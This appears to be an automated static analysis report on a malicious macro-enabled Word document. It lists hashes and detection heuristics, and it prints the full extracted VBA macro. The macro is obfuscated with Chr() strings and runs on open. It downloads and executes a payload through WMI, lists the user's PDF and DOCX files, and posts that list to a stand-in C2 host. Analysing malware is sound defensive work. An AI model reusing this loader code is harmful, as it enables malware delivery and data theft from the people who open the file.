Malicious Office (OOXML) / .DOCX — malware analysis report

Static analysis result for SHA-256 3dafcad1510282a6…

MALICIOUS

Office (OOXML) / .DOCX

19.5 KB Created: 2026-05-08 15:48:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2026-05-26
MD5: ead030784998a5b3d523ea7f2adead8b SHA-1: 59136f4476886e1b8f033decd17ddd29e5eddaa9 SHA-256: 3dafcad1510282a6f5ccbcd2c0fe65348cfe4dd43484830e7b705d6dcfc34926
390 Risk Score

Heuristics 9

  • ClamAV: Win.Worm.IFeel-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Worm.IFeel-1
  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
            objStream.Write objXMLHTTP.ResponseBody
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        strDocumentsPath = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108)).SpecialFolders(Chr(77) & Chr(121) & Chr(68) & Chr(111) & Chr(99) & Chr(117) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        strDocumentsPath = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108)).SpecialFolders(Chr(77) & Chr(121) & Chr(68) & Chr(111) & Chr(99) & Chr(117) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115))
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        Set objWMIService = GetObject(Chr(119) & Chr(105) & Chr(110) & Chr(109) & Chr(103) & Chr(109) & Chr(115) & Chr(58) & Chr(46) & Chr(92) & Chr(46) & Chr(92) & Chr(114) & Chr(111) & Chr(111) & Chr(116) & Chr(92) & Chr(99) & Chr(105) & Chr(109) & Chr(118) & Chr(50))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
    • http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
    • http://schemas.microsoft.com/office/2019/extlstReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
    • http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
    • http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2023/wordml/word16duReferenced by macro
    • http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahashReferenced by macro
    • http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlockReferenced by macro
    • http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4582 bytes
SHA-256: 59e91a07d053f52eebce356ed45c9017dadde8f2d26659b6b43ad47cf77b3488
Detection
ClamAV: Win.Worm.IFeel-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    Dim objWMIService As Object
    Dim objProcess As Object
    Dim objFSO As Object
    Dim objFolder As Object
    Dim objFile As Object
    Dim strDocumentsPath As String
    Dim strPayloadURL As String
    Dim strPayloadPath As String
    Dim strC2Server As String
    Dim strDataToSend As String
    Dim objXMLHTTP As Object
    Dim objStream As Object
    
    ' Set paths and URLs
    strDocumentsPath = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108)).SpecialFolders(Chr(77) & Chr(121) & Chr(68) & Chr(111) & Chr(99) & Chr(117) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & Chr(115))
    strPayloadURL = Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(101) & Chr(120) & Chr(97) & Chr(109) & Chr(112) & Chr(108) & Chr(101) & Chr(46) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & Chr(112) & Chr(97) & Chr(121) & Chr(108) & Chr(111) & Chr(97) & Chr(100) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
    strPayloadPath = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108)).ExpandEnvironmentStrings(Chr(37) & Chr(65) & Chr(80) & Chr(80) & Chr(68) & Chr(65) & Chr(84) & Chr(65) & Chr(37)) & Chr(92) & Chr(112) & Chr(97) & Chr(121) & Chr(108) & Chr(111) & Chr(97) & Chr(100) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
    strC2Server = Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(101) & Chr(120) & Chr(97) & Chr(109) & Chr(112) & Chr(108) & Chr(101) & Chr(46) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & Chr(99) & Chr(50)
    
    ' Download payload
    Set objXMLHTTP = CreateObject(Chr(77) & Chr(83) & Chr(88) & Chr(77) & Chr(76) & Chr(50) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84))
    objXMLHTTP.Open Chr(71) & Chr(69) & Chr(84), strPayloadURL, False
    objXMLHTTP.Send
    
    If objXMLHTTP.Status = 200 Then
        Set objStream = CreateObject(Chr(65) & Chr(68) & Chr(79) & Chr(66) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109))
        objStream.Type = 1 ' adTypeBinary
        objStream.Open
        objStream.Write objXMLHTTP.ResponseBody
        objStream.SaveToFile strPayloadPath, 2 ' adSaveCreateOverWrite
        objStream.Close
    End If
    
    ' Execute payload using WMI
    Set objWMIService = GetObject(Chr(119) & Chr(105) & Chr(110) & Chr(109) & Chr(103) & Chr(109) & Chr(115) & Chr(58) & Chr(46) & Chr(92) & Chr(46) & Chr(92) & Chr(114) & Chr(111) & Chr(111) & Chr(116) & Chr(92) & Chr(99) & Chr(105) & Chr(109) & Chr(118) & Chr(50))
    Set objProcess = objWMIService.Get(Chr(87) & Chr(105) & Chr(110) & Chr(51) & Chr(50) & Chr(95) & Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115))
    objProcess.Create strPayloadPath, Null, Null, intProcessID
    
    ' Discovery: Enumerate .pdf and .docx files in Documents folder
    Set objFSO = CreateObject(Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(105) & Chr(110) & Chr(103) & Chr(46) & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(83) & Chr(121) & Chr(115) & Chr(116) & Chr(101) & Chr(109) & Chr(79) & Chr(98) & Chr(106) & Chr(101) & Chr(99) & Chr(116))
    Set objFolder = objFSO.GetFolder(strDocumentsPath)
    
    For Each objFile In objFolder.Files
        If LCase(Right(objFile.Name, 4)) = Chr(46) & Chr(112) & Chr(100) & Chr(102) Or LCase(Right(objFile.Name, 5)) = Chr(46) & Chr(100) & Chr(111) & Chr(99) & Chr(120) Then
            ' Collect metadata or contents (example: file name and size)
            strDataToSend = strDataToSend & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(58) & Chr(32) & objFile.Name & Chr(44) & Chr(32) & Chr(83) & Chr(105) & Chr(122) & Chr(101) & Chr(58) & Chr(32) & objFile.Size & Chr(13) & Chr(10)
        End If
    Next
    
    ' Send collected data to C2 server
    Set objXMLHTTP = CreateObject(Chr(77) & Chr(83) & Chr(88) & Chr(77) & Chr(76) & Chr(50) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84))
    objXMLHTTP.Open Chr(80) & Chr(79) & Chr(83) & Chr(84), strC2Server, False
    objXMLHTTP.Send strDataToSend
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 14336 bytes
SHA-256: fba4e5ed7923879b0488f7743a02b5709e47ab8ad0aa2a50e26fdf345ff893bb
Detection
ClamAV: Win.Worm.IFeel-1
Obfuscation or payload: unlikely